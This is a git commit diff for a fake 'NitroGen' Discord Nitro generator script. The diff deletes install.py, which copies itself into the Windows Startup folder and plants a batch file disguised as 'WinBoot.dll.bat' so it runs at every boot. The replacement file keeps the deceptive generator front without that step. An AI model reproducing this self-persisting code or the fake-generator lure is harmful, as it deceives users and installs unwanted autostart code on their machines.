Update main.py
This commit is contained in:
parent
61a385c738
commit
ce8de6bdd4
18
install.py
18
install.py
|
@ -1,18 +0,0 @@
|
||||||
import os
|
|
||||||
import time
|
|
||||||
import requests
|
|
||||||
print("NitroGen")
|
|
||||||
print("----")
|
|
||||||
print("Installing")
|
|
||||||
time.sleep(1)
|
|
||||||
os.system("copy install.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
|
|
||||||
os.system("echo py install.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
|
|
||||||
x = requests.get('https://discord.com/nitro')
|
|
||||||
time.sleep(1)
|
|
||||||
print(x.text)
|
|
||||||
time.sleep(9)
|
|
||||||
print(x.text)
|
|
||||||
time.sleep(10)
|
|
||||||
print(x.text)
|
|
||||||
print("Something was fucked. Please try again")
|
|
||||||
exit(1)
|
|
|
@ -0,0 +1,16 @@
|
||||||
|
import os
|
||||||
|
import time
|
||||||
|
import requests
|
||||||
|
print("NitroGen")
|
||||||
|
print("----")
|
||||||
|
print("Running")
|
||||||
|
time.sleep(5)
|
||||||
|
x = requests.get('https://discord.com/nitro')
|
||||||
|
time.sleep(1)
|
||||||
|
print(x.text)
|
||||||
|
time.sleep(9)
|
||||||
|
print(x.text)
|
||||||
|
time.sleep(10)
|
||||||
|
print(x.text)
|
||||||
|
print("Something was fucked. Please try again")
|
||||||
|
exit(1)
|
Loading…
Reference in New Issue